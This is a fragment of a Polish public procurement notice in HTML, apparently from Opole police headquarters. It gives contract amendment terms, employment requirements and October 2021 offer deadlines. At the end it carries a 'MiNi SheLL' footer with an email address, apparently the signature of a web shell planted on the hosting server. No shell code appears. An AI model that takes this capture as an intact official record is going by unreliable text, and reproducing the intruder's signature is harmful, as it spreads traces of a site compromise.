-wszystkie podmioty ubiegające się wspólnie o udzielenie niniejszego zamówienia – z zaznaczeniem lidera/pełnomocnika <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art.455 ust.1 pkt 1) ustawy Pzp, przewiduje możliwość dokonania<br/>zmiany postanowień zawartej umowy w zakresie wskazanym w §15 wzoru umowy, stanowiącej<br/>integralną część SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-28 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym należy złożyć na Platformie znajdującej się pod adresem https://kwp-opole.ezamawiajacy.pl w zakładce „OFERTY”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-28 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com